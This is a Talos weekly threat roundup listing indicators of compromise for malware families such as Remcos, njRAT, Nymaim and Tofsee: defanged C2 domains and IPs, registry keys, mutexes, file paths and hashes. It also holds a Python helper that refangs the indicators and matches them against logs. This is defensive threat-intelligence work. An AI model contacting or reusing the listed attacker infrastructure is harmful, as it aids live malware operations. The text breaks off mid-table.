Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 30 and Aug. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
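A small parser for the IOC tables in this roundup, added here as an example and not code from Talos or from this post: it refangs the "[.]" notation, treats single IPs and the /30 or /31 ranges in the tables uniformly through the ipaddress module, checks constructed log lines against them, and applies an illustrative two-indicator threshold to reflect the caveat above that a single IOC match is not evidence of compromise on its own. The host names, log lines and threshold are assumptions; the indicator values are copied from the tables on this page.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed sample rows in the roundup's own "<indicator> <occurrences>"
# layout. Indicators are defanged with "[.]" and IP ranges may carry a
# CIDR suffix, exactly as in the tables on this page. The values below are
# copied from those tables; everything else in this file is illustrative.
IOC_ROWS = """\
195[.]181[.]248[.]12 25
104[.]44[.]194[.]232/30 127
209[.]85[.]202[.]26/31 88
thankyoulord[.]ddns[.]net 128
lazystax[.]ru 300
www[.]google[.]com 209
"""

# Constructed proxy/DNS log lines (hostnames and timestamps are made up).
SAMPLE_LOGS = """\
2021-08-02T10:11:12Z host=ws-017 action=connect dst=195.181.248.12 dport=443
2021-08-02T10:11:40Z host=ws-017 action=dns query=thankyoulord.ddns.net
2021-08-02T10:12:03Z host=ws-042 action=dns query=www.google.com
2021-08-02T10:12:30Z host=ws-058 action=connect dst=104.44.194.234 dport=25
2021-08-02T10:13:00Z host=ws-099 action=connect dst=10.0.0.5 dport=445
"""

ROW_RE = re.compile(r"^(\S+)\s+(\d+)$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
SRC_RE = re.compile(r"host=(\S+)")

Network = Tuple[ipaddress.IPv4Network, int]
Hit = Tuple[str, str, int]  # (source host, matched indicator, roundup occurrence count)


def refang(indicator: str) -> str:
    """Undo the page's "[.]" defanging so the value can be compared to live data."""
    return indicator.replace("[.]", ".")


def parse_ioc_rows(text: str) -> Tuple[List[Network], Dict[str, int]]:
    """Split roundup rows into IP networks (single IPs become /32) and domains."""
    networks: List[Network] = []
    domains: Dict[str, int] = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # skip headers, blank lines and "*See JSON" footers
        value, count = refang(m.group(1)), int(m.group(2))
        try:
            networks.append((ipaddress.ip_network(value, strict=False), count))
        except ValueError:
            domains[value.lower()] = count
    return networks, domains


def match_logs(logs: str, networks: List[Network], domains: Dict[str, int]) -> List[Hit]:
    """Return every (host, indicator, count) pair where a log line touches an IOC."""
    hits: List[Hit] = []
    for line in logs.splitlines():
        src = SRC_RE.search(line)
        host = src.group(1) if src else "unknown"
        for ip_text in IPV4_RE.findall(line):
            try:
                ip = ipaddress.ip_address(ip_text)
            except ValueError:
                continue  # e.g. "999.1.1.1" is matched by the loose regex
            for net, count in networks:
                if ip in net:
                    hits.append((host, str(net), count))
        for name in HOST_RE.findall(line):
            count = domains.get(name.lower())
            if count is not None:
                hits.append((host, name.lower(), count))
    return hits


def hosts_needing_review(hits: List[Hit], min_distinct: int = 2) -> List[str]:
    """Hosts that touched at least min_distinct different indicators.

    The threshold is an illustrative choice: a lone match on a domain such as
    www.google.com (which appears in the tables on this page) is not evidence
    on its own.
    """
    seen: Dict[str, set] = {}
    for host, indicator, _ in hits:
        seen.setdefault(host, set()).add(indicator)
    return sorted(h for h, inds in seen.items() if len(inds) >= min_distinct)


if __name__ == "__main__":
    nets, doms = parse_ioc_rows(IOC_ROWS)
    found = match_logs(SAMPLE_LOGS, nets, doms)
    for hit in found:
        print("hit: host=%s indicator=%s roundup_occurrences=%d" % hit)
    print("review:", hosts_needing_review(found))
```

The occurrence count from the roundup travels with each hit so an analyst can see how common the indicator was across the sandboxed samples; the tables on this page also contain widely used benign infrastructure (CDNs, Google, Microsoft), which is why the review rule looks for more than one distinct indicator per host rather than acting on any single match.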

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Malware.Autoit-9882353-0 | Malware | This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows attackers to write fully functional malicious software. This family installs itself on the system and contacts a C2 server to receive additional instructions or download follow-on payloads.
Win.Dropper.Remcos-9882391-1 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.njRAT-9882468-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Malware.Nymaim-9882470-0 | Malware | Nymaim is malware that can deliver ransomware and other malicious payloads. It uses a domain generation algorithm (DGA) to generate candidate command and control (C2) domains to connect to and retrieve additional payloads.
Win.Malware.Tofsee-9882650-1 | Malware | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the botnet's size.
Win.Packed.Dridex-9882835-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Dropper.TrickBot-9882885-0 | Dropper | TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Gh0stRAT-9882928-1 | Trojan | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Trojan.Zusy-9883232-0 | Trojan | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Threat Breakdown

Win.Malware.Autoit-9882353-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
195[.]181[.]248[.]12 25
120[.]136[.]10[.]20 12
192[.]35[.]177[.]64 10
172[.]67[.]75[.]27 8
104[.]26[.]13[.]247 7
72[.]21[.]81[.]240 6
104[.]26[.]12[.]247 6
23[.]3[.]13[.]154 2
205[.]185[.]216[.]42 1
23[.]3[.]13[.]88 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
vinyamars[.]sk 25
arm[.]com[.]ng 13
www[.]arm[.]com[.]ng 13
www[.]colorsshoes[.]jp 12
apps[.]digsigtrust[.]com 10
apps[.]identrust[.]com 10
cs11[.]wpc[.]v0cdn[.]net 6
cds[.]d2s7q6s2[.]hwcdn[.]net 1
Files and or directories created | Occurrences
%TEMP%\home1.txt 25

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Remcos-9882391-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 138 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\REMCOS-0S5XD9 128
<HKCU>\SOFTWARE\REMCOS-0S5XD9
Value Name: licence
128
<HKCU>\SOFTWARE\REMCOS-0S5XD9
Value Name: exepath
128
Mutexes | Occurrences
Remcos_Mutex_Inj 128
Remcos-0S5XD9 128
BCevEgBhzLGKaNZWXfH 128
Global\d5a46aa1-eedf-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
173[.]194[.]68[.]156 1
140[.]82[.]112[.]4 1
20[.]36[.]253[.]92 1
52[.]85[.]144[.]86 1
65[.]55[.]44[.]109 1
199[.]232[.]38[.]217 1
52[.]85[.]144[.]68 1
172[.]217[.]222[.]138 1
185[.]199[.]109[.]133 1
54[.]81[.]163[.]76 1
44[.]230[.]27[.]49 1
23[.]38[.]131[.]139 1
44[.]238[.]161[.]76 1
52[.]114[.]158[.]50 1
5[.]61[.]37[.]41 1
95[.]216[.]195[.]92 1
23[.]78[.]173[.]83 1
193[.]56[.]146[.]41 1
193[.]56[.]146[.]42 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
thankyoulord[.]ddns[.]net 128
github[.]com 1
e11290[.]dspg[.]akamaiedge[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
go[.]microsoft[.]com 1
docs[.]microsoft[.]com 1
wcpstatic[.]microsoft[.]com 1
www-google-analytics[.]l[.]google[.]com 1
www[.]google-analytics[.]com 1
w[.]usabilla[.]com 1
web[.]vortex[.]data[.]trafficmanager[.]net 1
a3[.]shared[.]global[.]fastly[.]net 1
cdn[.]speedcurve[.]com 1
web[.]vortex[.]data[.]microsoft[.]com 1
stats[.]l[.]doubleclick[.]net 1
c-msn-com-nsatc[.]trafficmanager[.]net 1
stats[.]g[.]doubleclick[.]net 1
c[.]bing[.]com 1
c1[.]microsoft[.]com 1
avatars[.]githubusercontent[.]com 1
js[.]monitor[.]azure[.]com 1
browser[.]events[.]data[.]microsoft[.]com 1
skypedataprdcolwus02[.]cloudapp[.]net 1
Files and or directories created | Occurrences
\TEMP\test.exe 129
%System32%\Tasks\Updates 128
%System32%\Tasks\Updates\vXAlJeWc 128
%APPDATA%\vXAlJeWc.exe 128
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 128
\test.exe 56
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\test.exe.log 55
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\startupCache.4.little 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache.bin (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\session-state.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\session-state.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\extensions.json (copy) 1

*See JSON for more IOCs

File Hashes

02321739421cbb09b54d680e335185f7de92b600091b98329513d93105b52cf9
056f7e71e78e17cb0aa79b64da08286b964f2178d2090d64911c6642c36814c2
05d17139b921ae02f19e54781b300706557784df832ddbc079b3fe7536a31e53
0629ae9ce719b554c6424aa99ddb7846c84c5d974ab154b86b93a02fae8b9e7f
0d7a9543ec582ffc43374849315420543f2cc965dd4bb2e5e35ab4184d2e2ca1
0e51d9a05ced1a052a3d1e040c77d7e2159f5337739d69521d14dacbb599a0bd
11fa1333306fce3fa0d07f67f7889a07c9ff46c2bea22d5fe6ccfb1a1e09fad7
14a3210351da92f62bcb1fdf17488d3c43256e32707927c93a6491919e30db94
166532feecaa14575279d728da2c9988049a8a7ea5d479e04c588a554a097809
1ae5c64428959fef8b3478d1122637582a8194c5e34f8c3d038bf1373e003151
1e7978e1cb0ba4b5299d27d02c24d1ffa5db3b71eb908b8140f06eb081d658dd
218157900d57ddfce9598f8d49b0a8ccae080585cf19e01566ed73e2396131b1
22097730f40c3674a5b6050cfe2cf4ffed317d655e1c5c0d2a421fde7b07cfc4
2215b8b4b20a409c462e851f8597a12979781c8944204f26110e966860556b36
2247a83cbf55716bdd74aa1e05de9e4f89c802b8eb86590da762dd2f789b6831
254c9b7ed45741e81a5dbeb2a2214c57fbe43c10fab1da1a74f8549c64280ae5
2733f90b77a0b67f033a5188ca6d1a46e754dff03b5656dafb034d523e121c92
282b00987afb9dc3b65e035b1bd657ecc5ac7e52e9aee19c70f2f9265646fae7
2ada77612f68d343b4bcf228680b62ec266d00475446059729ce9ab7c68a154b
2c2b86f171fc93e574ba1a061ac87a0a3fca981f469104fa3cfbad54f313faa7
2c4bbc96d9a6d42c0b43e55735bfb7f90f891d97eee01b0c3520fdaf8f32c2fa
313ea6fc3c74e6c22980ddeaf1cea19f7ee7edeae2c71c4c1256ecf015d7189a
31e51fcfaaac27c60699174b6ab7e62beb11c6bc956c77a5cf85122a58c11487
3382824ce7a07e71dceae6980e76a716b1b8a00f746022d18545e50cae6b0984
33fc3a1693034d07cf75662a8e2245a895448d1db5249626129c660774263f14

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.njRAT-9882468-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
17
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 5cd8f17f4086744065eb0992a09e05a2
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 5cd8f17f4086744065eb0992a09e05a2
2
<HKCU>\SOFTWARE\7CC1F7C2D4BAE6BC7887F26D77AA018C 2
<HKCU>\SOFTWARE\7CC1F7C2D4BAE6BC7887F26D77AA018C
Value Name: [kl]
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 212683d986fb740ad6a40184df48e604
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 212683d986fb740ad6a40184df48e604
1
<HKCU>\SOFTWARE\212683D986FB740AD6A40184DF48E604
Value Name: [kl]
1
<HKCU>\SOFTWARE\212683D986FB740AD6A40184DF48E604 1
<HKCU>\SOFTWARE\7C8F800C2AE443A9C83B151599F29C82 1
<HKCU>\SOFTWARE\7C8F800C2AE443A9C83B151599F29C82
Value Name: [kl]
1
<HKCU>\SOFTWARE\E1785F1E26AD1CA79573011E0FF02E70 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e1785f1e26ad1ca79573011e0ff02e70
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e1785f1e26ad1ca79573011e0ff02e70
1
<HKCU>\SOFTWARE\E1785F1E26AD1CA79573011E0FF02E70
Value Name: [kl]
1
<HKCU>\SOFTWARE\AB1AAA0BFE3591BECA82BFE474A8F47B 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ab1aaa0bfe3591beca82bfe474a8f47b
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ab1aaa0bfe3591beca82bfe474a8f47b
1
<HKCU>\SOFTWARE\AB1AAA0BFE3591BECA82BFE474A8F47B
Value Name: [kl]
1
<HKCU>\SOFTWARE\0886B3912F2BB02C6693C574C429F051 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 0886b3912f2bb02c6693c574c429f051
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 0886b3912f2bb02c6693c574c429f051
1
<HKCU>\SOFTWARE\0886B3912F2BB02C6693C574C429F051
Value Name: [kl]
1
Mutexes | Occurrences
<32 random hex characters> 17
5cd8f17f4086744065eb0992a09e05a2 3
Global\0c5a41e1-f0e9-11eb-b5f8-00501e3ae7b6 1
Global\0ccf23c1-f0e9-11eb-b5f8-00501e3ae7b6 1
Global\0cf9fc81-f0e9-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
94[.]73[.]33[.]36 1
94[.]73[.]41[.]240 1
78[.]159[.]131[.]121 1
41[.]200[.]143[.]212 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
kinghonza[.]no-ip[.]biz 2
ramisy[.]ddns[.]net 2
zzzzaaaa[.]ddns[.]net 1
mhmd[.]ddns[.]net 1
hacker7[.]ddns[.]net 1
computer[.]no-ip[.]biz 1
maazxmbm[.]ddns[.]net 1
lkshkht1[.]myftp[.]biz 1
wassim1202[.]ddns[.]net 1
pouti1[.]no-ip[.]biz 1
ramisy[.]myq-see[.]com 1
abdullahss[.]no-ip[.]biz 1
noor85[.]no-ip[.]biz 1
kishk00[.]ddns[.]net 1
Files and or directories created | Occurrences
%TEMP%\e653d73e45833b6c 25
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 21
%TEMP%\server.exe 9
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 8
\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2 3
%TEMP%\Trojan.exe.tmp 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5cd8f17f4086744065eb0992a09e05a2.exe 2
\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 1
%APPDATA%\server.exe 1
%TEMP%\system32.exe 1
%TEMP%\server1.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\0886b3912f2bb02c6693c574c429f051.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\4fc66b344f8529857a68b59448691734.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9fcc88f1f248b4dbfd803b65f449acf3.exe 1
%ProgramData%\zzzz.exe 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\500965600.exe.log 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\Windows.exe.log 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5b2cd92f335e3944d2dfa471de408b34.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d1e729a473975eff06a55a309c2013cd.exe 1

File Hashes

105c3207f7516582d02c26428e32e64181c3d258dbb2358ab17b69e7b2e89b2d
12abcf56af00731447ed0cffbb7951e66d562cf39cd135b243dbfe595e37fc91
1af8edb622dbf1c1e60b1811ec4f8447c512a1aecd5cc00b3d6615eba4ca9588
1bc839f6a608310224dd06d66900a6314ffe6f6fc8cd4bfd0a0b3cda6e589ce9
24b5fbba292e1209a1b00497f14d6bc21e4b25a1adad781788505fe9be6f5178
29751d69e6beb986895de10afbefd17885e9f5fa4aa0f281f5a03948f8c76cc7
2b2ecd7bf3a04c8ce24a51c001b28006f00259665644ce828992c24def0559de
4266fcb85ba8c4bd6c13dcdf2833e9477b10fdcf554448f0a5c2992a2686c172
43f46de7cb7594b013a83601648544a3047b5d77e09e05f34b286f8c6960ba52
4dc216750b20e0594c18cdb52f5578413d918c8f4e032541badcbdbc28a9d555
53e739f663ee64dbff220383811d3255300b7a8c459d3acd47d1e539fec04f45
576cb07ae49d569971075bfcb4781e499c5c09cf5c5fa84d72dae2ebf050b819
613050981c98182bae457f83bc0513ecbc1f92da6ed3eaf84449969cfebee58e
6a4c7065537bcf08a36a6b88fd2ae85937061d9d963e8af70af1341d45a5c052
6d59405409e92fc6bc71bce7027f69148666e0e730ea16e60d5327a91b09f73f
6f3d01c3edc8681f835c00baca862d5b37b2c8e9949c3a1e0691b256a5b1e1d1
71b2ebba1f2cf21e2514e99449d0e41ac32d72baba7b71d49b014b275158da1b
7a925a4f0f083b9b4969c0974ec64bffb7049b46854fd578e488af32eab4518b
94a8250c4b36e57767ac6a204e6e8c7a322941576e7530e9b88dcf3c3e4529ae
9616f7c07cd16bb46cadadedc01328d69ec7f42feab2d994d137d93c555b5635
978fbdc3fb2ba585d221a57d1d48bd829e7a1a6cc6f012ebfbe87e5245c8cf96
985926c2a2d61cf9d28f0fae4f8c4ca68a5761fded38343e4e3fd093d47e3507
a510164d2a47b9f5c4ea2f86f210f523df91b956ccd54e7ee44f38b5a542adf6
b9e792fbb80a256fbcf6fa9a3361b17c81c40fdfd56f8b046f50ecb4d49bc9be
caf13a878409702e6eec3958e40f0f9ec85ee173fa326f6fcd0f32e45f59af77

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Nymaim-9882470-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 22
<HKCU>\SOFTWARE\MICROSOFT\KPQL 22
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
22
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp
22
Mutexes | Occurrences
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 22
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 22
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 22
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 22
Local\{B13D69F8-F0AA-A818-5093-74D6601607EE} 22
Local\{364979D3-CCFF-AEC0-03C9-4C6906B10346} 22
Local\{E55AD28E-29DB-FB2A-7AB3-28939E6ED727} 22
Local\{1597A4DE-9B90-FFD9-AEFD-35162EE2C568} 22
Local\{1E3C2A10-A2FE-DF24-DAA2-BB385E44D2D0} 22
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
52[.]85[.]144[.]32 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
luuypgmmlndq[.]in 22
ruqcdr[.]in 22
modsbicfioxd[.]pw 22
cwfjj[.]pw 22
atmnjoted[.]com 22
uudoonnyycw[.]net 22
zfougwzcl[.]net 22
ptudgjdocbd[.]pw 22
rsuamdj[.]in 22
eafjh[.]pw 22
vmpqvbrhlri[.]in 22
fincbuu[.]net 22
ryheqdimmr[.]in 22
mvtforxht[.]com 22
ggtwx[.]com 22
vrboynwrdl[.]net 22
rarcraaisq[.]pw 22
rbtnpeutu[.]in 22
otjyzplh[.]net 22
iukobk[.]net 22
ehtsftixqw[.]pw 22
twkzd[.]net 22
pylxcogkv[.]net 22
zzosavwbgu[.]in 22
ymqkldw[.]net 22

*See JSON for more IOCs

Files and or directories created | Occurrences
%ProgramData%\ph 22
%ProgramData%\ph\eqdw.dbc 22
%ProgramData%\ph\fktiipx.ftf 22
%TEMP%\gocf.ksv 22
%TEMP%\kpqlnn.iuy 22
%ProgramData%\jzk\icolry.ylg 22
%TEMP%\qnvgtx.eww 22
%ProgramData%\jzk\betrwq.wot 22
%TEMP%\xyubi.zds 22

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Tofsee-9882650-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 300 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 299
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
212
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: DisplayName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Description
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU 19
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: DisplayName
18
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
43[.]231[.]4[.]7 300
192[.]162[.]246[.]7 209
5[.]61[.]37[.]41 209
95[.]216[.]195[.]92 209
142[.]250[.]72[.]100 181
104[.]47[.]54[.]36 153
104[.]47[.]53[.]36 146
104[.]44[.]194[.]232/30 127
193[.]56[.]146[.]40/30 90
209[.]85[.]202[.]26/31 88
65[.]9[.]117[.]69 85
31[.]13[.]65[.]174 80
173[.]194[.]68[.]26/31 80
64[.]233[.]186[.]26/31 80
208[.]71[.]35[.]137 79
67[.]195[.]204[.]72/31 79
192[.]0[.]47[.]59 77
104[.]44[.]194[.]236/31 77
98[.]136[.]96[.]76/31 76
208[.]76[.]50[.]50 74
64[.]233[.]184[.]26/31 72
208[.]76[.]51[.]51 70
40[.]113[.]200[.]201 69
199[.]5[.]157[.]131 68
216[.]239[.]36[.]126 67

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
